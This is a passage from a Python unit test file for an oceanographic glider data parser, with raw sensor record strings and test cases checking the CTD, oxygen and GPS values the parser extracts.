NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 645.569 0.390792 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 892 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 133 0.000262988 460 73 2.12 695 115 0.847 NaN 559 1000.1 NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 700 133 0.000263 695 115 0.847 559"""
ENGSCI_RECORD = """
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46526 2.45955 0 57.8052 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46386 2.45876 0 57.8047 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
ENGSCI_RECORD_69 = """
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 69696969 69696969 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 696969690007145 0 2.46526 2.45955 0 57.8052 0 0 0 69696969000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 69696969 69696969 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 696969690007145 0 2.46386 2.45876 0 57.8047 0 0 0 69696969000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
ENGSCI_BAD_LAT_RECORD = """
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 433X -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46526 2.45955 0 57.8052 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 30 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46386 2.45876 0 57.8047 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
FLORT_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 664.424 0.401911 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 139 0.000281336 460 72 2.0352 695 114 0.8349 NaN 560 NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN 266.42 93.49 9.48 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 645.569 0.390792 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 892 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 133 0.000262988 460 73 2.12 695 115 0.847 NaN 559 NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
FLORT_O_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1783.96 1439822650.9566 NaN NaN NaN NaN 70 101 169 550 77399.4 4004 134 2903 1783.96 1439822650.9566 261.501 93.736 10.508 0.0795487 5.67933 0 -2e-05 0 11.1774
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 221.447 1439822869.44687 NaN NaN NaN NaN 148 217 4047 556 738528000 280 60 95 221.447 1439822869.44687 NaN NaN NaN NaN NaN NaN NaN NaN NaN """
EMPTY_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
ZERO_GPS_VALUE = """
NaN 0 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
INT_GPS_VALUE = """
NaN 2012 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
CTDGV_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121147 1378349241.82962 NaN NaN NaN NaN NaN NaN 121147 1378349241.82962 NaN NaN 4.03096 0.021 15.3683
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121207 1378349302.10907 NaN NaN NaN NaN NaN NaN 121207 1378349302.10907 NaN NaN 4.03113 0.093 15.3703 """
DOSTA_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121144 1378349238.77789 NaN NaN NaN NaN NaN NaN 121144 1378349238.77789 242.217 96.009 NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121204 1378349299.09106 NaN NaN NaN NaN NaN NaN 121204 1378349299.09106 242.141 95.988 NaN NaN NaN """
ENG_RECORD = """
0.273273 NaN NaN 0.335 149.608 0.114297 33.9352 -64.3506 NaN NaN NaN 5011.38113678061 -14433.5809717525 NaN 121546 1378349641.79871 NaN NaN NaN 0 NaN NaN NaN NaN NaN NaN NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1.23569 NaN NaN -0.0820305 121379 1378349475.09927 0.236869 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
@attr('UNIT', group='mi')
class GliderParserUnitTestCase(ParserUnitTestCase):
"""
Glider Parser unit test base class and common tests.
"""
config = {}
def set_data(self, *args):
"""
Accept strings of data in args[] joined together and then a file handle
to the concatenated string is returned.
"""
io = StringIO()
for count, data in enumerate(args):
io.write(data)
# log.debug("Test data file: %s", io.getvalue())
io.seek(0)
self.test_data = io
def assert_no_more_data(self):
"""
Verify we don't find any other records in the data file.
"""
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
def assert_generate_particle(self, particle_type, values_dict=None):
"""
Verify that we can generate a particle of the correct type and that
the state is set properly.
@param values_dict key value pairs to test in the particle.
"""
records = self.parser.get_records(1)
self.assertIsNotNone(records)
self.assertIsInstance(records, list)
self.assertEqual(len(records), 1)
self.assert_type(records, particle_type)
# Verify the data
if values_dict:
self.assert_particle_values(records[0], values_dict)
return records
def assert_particle_values(self, particle, expected_values):
"""
Verify the data in expected values is the data in the particle
"""
data_dict = particle.generate_dict()
log.debug("Data in particle: %s", data_dict)
log.debug("Expected Data: %s", expected_values)
for key in expected_values.keys():
for value in data_dict['values']:
if value['value_id'] == key:
self.assertEqual(value['value'], expected_values[key])
def assert_type(self, records, particle_class):
for particle in records:
str_of_type = particle.data_particle_type()
self.assertEqual(particle_class._data_particle_type, str_of_type)
@attr('UNIT', group='mi')
class CtdgvTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for ctdgv glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'CtdgvTelemeteredDataParticle'
}
def test_ctdgv_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER, CTDGV_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3683, CtdgvParticleKey.SCI_WATER_COND: 4.03096,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.021}
record_2 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3703, CtdgvParticleKey.SCI_WATER_COND: 4.03113,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.093}
self.assert_generate_particle(CtdgvTelemeteredDataParticle, record_1)
self.assert_generate_particle(CtdgvTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_gps(self):
self.set_data(HEADER, ZERO_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
self.set_data(HEADER, INT_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
def test_single_yml(self):
"""
Test with a yml file with a single record
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'single_ctdgv_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(1)
self.assert_particles(record, 'single_ctdgv_record.mrg.result.yml', CTDGV_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'multiple_ctdgv_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_ctdgv_record.mrg.result.yml', CTDGV_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test with several real files and confirm no exceptions occur
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_199_0_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(1107)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_199_5_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(108)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_364_2013_192_1_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(4)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class CtdgvRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for ctdgv glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'CtdgvRecoveredDataParticle'
}
def test_ctdgv_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER, CTDGV_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3683, CtdgvParticleKey.SCI_WATER_COND: 4.03096,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.021}
record_2 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3703, CtdgvParticleKey.SCI_WATER_COND: 4.03113,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.093}
self.assert_generate_particle(CtdgvRecoveredDataParticle, record_1)
self.assert_generate_particle(CtdgvRecoveredDataParticle, record_2)
self.assert_no_more_data()
def test_gps(self):
self.set_data(HEADER, ZERO_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
self.set_data(HEADER, INT_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
@attr('UNIT', group='mi')
class DOSTATelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for dosta glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'DostaTelemeteredDataParticle'
}
def test_dosta_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER, DOSTA_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {DostaTelemeteredParticleKey.SCI_OXY4_OXYGEN: 242.217,
DostaTelemeteredParticleKey.SCI_OXY4_SATURATION: 96.009}
record_2 = {DostaTelemeteredParticleKey.SCI_OXY4_OXYGEN: 242.141,
DostaTelemeteredParticleKey.SCI_OXY4_SATURATION: 95.988}
self.assert_generate_particle(DostaTelemeteredDataParticle, record_1)
self.assert_generate_particle(DostaTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with a multiple records
"""
with open(os.path.join(DOSTA_RESOURCE_PATH, 'multiple_dosta_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_dosta_record.mrg.result.yml', DOSTA_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test with a real file and confirm no exceptions occur
"""
with open(os.path.join(DOSTA_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class DOSTARecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered dosta glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'DostaRecoveredDataParticle'
}
def test_dosta_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER, DOSTA_RECORD)
